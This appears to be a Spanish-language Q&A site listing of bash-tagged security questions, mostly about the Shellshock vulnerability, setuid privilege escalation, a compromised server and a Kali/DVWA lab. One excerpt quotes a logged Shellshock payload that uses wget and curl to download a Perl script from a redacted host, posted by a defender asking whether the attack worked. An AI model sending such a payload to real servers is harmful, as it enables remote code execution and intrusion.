Preguntas con etiqueta 'bash'

5
respuestas

¿Puede un archivo .sh ser malware?

¿Puede un archivo .sh ser un virus o algo dañino? ¿Es como .exe archivos en Windows? En caso afirmativo, ¿puede alguien leer este script y decirme si es seguro y cómo funciona? en la seguridad GnuPG? Me da la opción de cifrar arc...
hecha 02.06.2012 - 23:39
5
respuestas

¿Reemplazar a bash con otro shell es un paso prudente?

Teniendo en cuenta que RedHat y otros equipos importantes en negocios están realizando una auditoría en bash y han descubierto algunas otras vulnerabilidades además de -7169 (-7186 y -7187), ¿es sensato vincular /bin/sh a otro shell? p>...
hecha 27.09.2014 - 11:15
4
respuestas

¿La función de importación de la función de shell bash genera inevitablemente un problema de escalamiento de privilegios?

Incluso sin el problema inmediato de ejecución de código de los comandos finales Shellshock , ¿en qué medida la característica de las funciones de importación de bash del entorno genera una vulnerabilidad integral de escalamiento de privilegios...
hecha 29.09.2014 - 13:07
1
respuesta

Incluso con el parche Shellshock, ¿no es Bash vulnerable a la redefinición de comandos?

A riesgo de agregar al montón de preguntas relacionadas con "Shellshock" ... El parche Shellshock evita que se ejecute código arbitrario después de las definiciones de funciones en las variables de entorno. Por ejemplo, aquí está lo que hace...
hecha 25.09.2014 - 21:51
2
respuestas

¿Shellshock produce un vector integral de escalamiento de privilegios locales?

Si las secuencias de comandos setuid toman variables de entorno arbitrarias, aparte de unas pocas de la lista negra como LD_LIBRARY_PATH , la persona que llama, no significa que cualquier secuencia de comandos setuid que se e...
hecha 29.09.2014 - 11:54
4
respuestas

¿Cómo se ven los ataques de shellshock en los registros del sistema? [cerrado]

Tengo algunos servidores Linux, que por lo que puedo decir no son vulnerables al vector de ataque de shellshock, pero tengo curiosidad por el aspecto del ataque en los registros. ¿Cómo se ve un ataque exitoso en los registros de appache2? ¿Cómo...
hecha 26.09.2014 - 14:25
3
respuestas

MSFConsole / Kali Linux - obtenga acceso de root al sistema Unix

Estoy perdiendo el tiempo con Kali Linux, MSFConsole y DVWA (Damn Vulnerable Web Application). He logrado ingresar al sistema (Raspberry Pi) al crear una puerta trasera de PHP y la cargué mediante inyección SQL. Ahora tengo acceso al siste...
hecha 09.08.2015 - 19:29
2
respuestas

Servidor Ubuntu hackeado, probablemente comandos pirateados (netstat, ps, ...), ¿cómo reemplazarlos? [duplicar]

Un servidor Ubuntu de mi empresa ha sido hackeado para llevar a cabo un ataque DoS. Encontré que bug de shellshock no fue corregido por mis colegas, y creo que ese es el problema. Luego, encontré un archivo ELF que envía miles de mensajes,...
hecha 28.11.2014 - 12:28
1
respuesta

Evidencia de Shellshock Exploit: ¿es este un ataque exitoso?

Estuve revisando los registros hoy y noté lo siguiente: 62.219.116.107 - - [26/Dec/2016:15:16:08 -0100] "GET / HTTP/1.0" 200 13501 "-" "() { :;}; /bin/bash -c \"wget http://[redacted]/bo.pl -O /tmp/bo.pl;curl -o /tmp/bo.pl http://[redacted]/b...
hecha 27.12.2016 - 02:36
2
respuestas

¿Cómo hago un seguimiento de la limpieza del historial de bash?

Me gustaría capturar eventos cuando se limpia el historial de bash o se eliminan algunas líneas. ¿Existen prácticas recomendadas o herramientas de auditoría con esta capacidad?     
hecha 24.07.2017 - 17:02